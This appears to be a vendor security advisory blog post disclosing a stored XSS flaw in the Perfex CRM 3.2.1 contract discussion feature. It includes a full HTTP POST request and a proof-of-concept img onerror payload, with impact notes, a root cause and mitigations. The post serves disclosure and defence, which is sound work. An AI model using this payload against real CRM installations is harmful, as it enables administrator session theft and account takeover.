Need an urgent support?

Call: +1 302 556 8229

Stored XSS in Perfex CRM 3.2.1 Contracts Module

by

A Stored Cross-Site Scripting (XSS) vulnerability exists in the Contracts Module of Perfex CRM, allowing authenticated client users to inject malicious JavaScript payloads. The input is stored in the contract discussion section and executes when an administrator views the contract, potentially leading to session hijacking, phishing attacks, or full account compromise.

Example Request:

POST /perfex/contract/3/33a4e5c951a2eb02fd0cb5da5af0ad3e HTTP/1.1
Host: 192.168.1.11
Content-Length: 139
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://192.168.1.11
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.11/perfex/contract/3/33a4e5c951a2eb02fd0cb5da5af0ad3e
Accept-Encoding: gzip, deflate, br
Cookie: contact_language=english; csrf_cookie_name=a77eab9f9ce71314136c96e567cc5c54; sp_session=tjk37hhbghll23a48k9tdp6v0jr7l5pk
Connection: keep-alive

csrf_token_name=a77eab9f9ce71314136c96e567cc5c54&content=%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22XSS%22%29%26gt%3B&action=contract_comment

Affected Endpoint

POST /perfex/contract/{contract_id}/{hash} HTTP/1.1

Proof-of-Concept (PoC)

  1. Client Logs In to Perfex CRM.
  2. Navigates to http://host/perfex/contract/{id}.
  3. Submits a stored XSS payload in the discussion:
    1<img src=x onerror=alert(1)>
  4. Admin Opens the Contract Discussion.
  5. JavaScript Executes, Triggering Stored XSS.

Impact

  • Attackers can steal admin session cookies via JavaScript
  • Automatic Execution: Unlike click-based XSS, this payload triggers instantly when the admin views the page.
  • Full Account Takeover: Inject a keylogger to capture admin input.

Root Cause Analysis

Perfex CRM fails to properly sanitize user input in the contract discussion section.

  • Expected Behavior: User input should be HTML-encoded or filtered for JavaScript execution.
  • Actual Behavior: The system renders user input as raw HTML, leading to stored XSS.
  • Flawed HTML Entity Decoding: The system decodes &lt; and &gt; back into < >, allowing stored JavaScript execution.

Recommended Mitigations

The developer team has been notified about the vulnerability. The developer confirmed the problem, and an official patch awaits release.

  • Sanitize User Input
  • Use Content Security Policy (CSP)
  • Enable XSS Protection in CodeIgniter
  • Validate & Escape Output Properly
  • Update to Latest Version

Previous post

Fixing GPG Errors and Repository Issues in Linux

NEXT post

Stored Cross-Site Scripting in Perfex CRM 3.2.1 Project Discussions

Written by

Bytium Team

Bytium is a global information technology company aim to empower business with hassle-free various IT services including general IT support to advanced cybersecurity services for affordable price.

Bytium®

Bytium LLC is a limited liability company (LLC) registered in the USA delivering technology-driven solutions and services to businesses worldwide. With a focus on innovation, security, and operational excellence, we empower organizations to streamline processes, enhance resilience, and drive sustainable growth.

Services

Cybersecurity Services

IT Support

Cloud Support

Services in Bangladesh

Company

About Us

Trust & Security

Client Portal

Contact

Resources

Blogs

Advisory

Case Studies

Cybersecurity

Bytium LLC

[email protected]
+1 302 556 8229

USA

8 The Green #12107, Dover, DE, 19901
+1 302 556 8229

Bytium BD

Medical East Gate, Dhap, Rangpur, 5400
+880 1836 830 755

© 2025 Bytium LLC. Bytium® is a registered trademark. All rights reserved.

Privacy policy | Trademark